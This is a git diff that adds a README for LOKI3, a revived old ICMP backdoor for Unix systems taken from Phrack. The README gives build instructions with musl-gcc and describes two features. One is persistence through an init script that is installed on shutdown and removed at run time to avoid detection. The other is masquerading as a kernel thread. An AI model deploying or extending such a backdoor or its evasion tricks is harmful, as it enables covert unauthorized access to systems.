diff options
Diffstat (limited to 'README.md')
| -rw-r--r-- | README.md | 46 |
1 files changed, 46 insertions, 0 deletions
diff --git a/README.md b/README.md new file mode 100644 index 0000000..0ef76b0 --- /dev/null +++ b/README.md @@ -0,0 +1,46 @@ +# LOKI3 + +This code was stolen from Phrack magazine. It is a 20+ year old backdoor +for Linux, BSD, Solaris, ... which works over icmp. + +http://www.phrack.org/issues/49/6.html +http://www.phrack.org/issues/51/6.html + +This code no longer compiled as of ~2016 I made it compile on modern +systems with musl-gcc, so it will "just work". + +## Building + +### Install musl-gcc + +I use musl because the objects reusulting from static linking using +gcc or clang do not work on older kernels. + +Installing is easy on Ubuntu 20.04: +``` +apt install musl-tools +``` + +Cross compilers can be found here: https://musl.cc/ + +### Building +`make` will list the available targets. + +#### Linux +`make linux` + +## Persistence + +If compiled with PERSISTENCE defined, lokid will install a SysV init +script when SIGTERM is recieved. This signal is typically sent when +the system is rebooted or the process is killed with `kill` or +`killall` without specifying which signal to send (ex: kill -9 or kill +-HUP send the SIGKILL and SIGHUP signals, respectively). + +When lokid is ran, it removes this persistence to avoid detection. + +## Process Masquerading + +This process masquerades itself as a kernel thread. See prochide.c for +more details. + |